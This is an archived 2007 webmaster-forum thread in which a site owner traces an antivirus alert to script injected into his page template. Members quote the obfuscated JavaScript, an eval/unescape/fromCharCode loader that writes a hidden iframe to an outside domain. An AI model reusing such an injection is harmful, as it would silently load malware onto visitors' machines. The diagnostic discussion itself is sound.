GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   does this page load virus for you? (https://gfy.com/showthread.php?t=765703)

zentz 09-03-2007 05:18 PM
does this page load virus for you?
 
http://www.studvids.com/main.php

My norton av reports a virus.

Risk name: http winzip activex control killbit

This is my page and i really dont know where is the virus coming from.

StarkReality 09-03-2007 05:23 PM
Looking at your code, you seem to use linkex, which can be exploited, any code can be inserted/run on your site as long as you don't use a fixed version...if there is already any.

Too lazy to dig the post, but the exploit was published here on GFY.

Well, best explanation I could find.

Pleasurepays 09-03-2007 05:24 PM
whats next? are you going to ask someone to stand in front of you pointing a gun at them while you pull the trigger to find out if its loaded?

jesus.

StarkReality 09-03-2007 05:26 PM
Quote:
Originally Posted by Pleasurepays (Post 13028071)
whats next? are you going to ask someone to stand in front of you pointing a gun at them while you pull the trigger to find out if its loaded?

jesus.
Just run a sandoxed browser on stuff like this :winkwink:

The Duck 09-03-2007 05:28 PM
I dont really want to.

Fletch XXX 09-03-2007 05:28 PM
*sending this link to mom*

Corleone 09-03-2007 05:29 PM
Quote:
Originally Posted by Pleasurepays (Post 13028071)
whats next? are you going to ask someone to stand in front of you pointing a gun at them while you pull the trigger to find out if its loaded?

jesus.
:1orglaugh

Spunky 09-03-2007 05:31 PM
Yes,my Norton blocked an attempt

Spunky 09-03-2007 05:34 PM
Yes,my Norton blocked an attempt

Quickdraw 09-03-2007 05:44 PM
here is the code if that helps. It produces an iframe to potipeople.info/index.php

Code:
language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C112%2C111%2C116%2C105%2C112%2C101%2C111%2C112%2C108%2C101%2C46%2C105%2C110%2C102%2C111%2C47%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));

zentz 09-03-2007 05:49 PM
Quote:
Originally Posted by Quickdraw (Post 13028137)
here is the code if that helps. It produces an iframe to potipeople.info/index.php

Code:
language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C112%2C111%2C116%2C105%2C112%2C101%2C111%2C112%2C108%2C101%2C46%2C105%2C110%2C102%2C111%2C47%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));
now how did that come here!

Lonny 09-03-2007 05:51 PM
my antivir blocked an attempt.

zentz 09-03-2007 06:00 PM
the exploit was in my ATX toplist template. now to find out how did that come over there.

mattz 09-03-2007 06:03 PM
zents off topic here but I never see ya on icq anymore, can I renew my pa?

peterk 09-03-2007 06:41 PM
Yes indeed, my antivir blocked it

zentz 09-03-2007 06:48 PM
Quote:
Originally Posted by peterk (Post 13028369)
Yes indeed, my antivir blocked it
hehe you're just collecting posts, i removed the exploit 30 minutes ago ;)

Will Saucebox 09-03-2007 07:20 PM
ah just a sec...let me check...lol


All times are GMT -7. The time now is 04:13 AM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123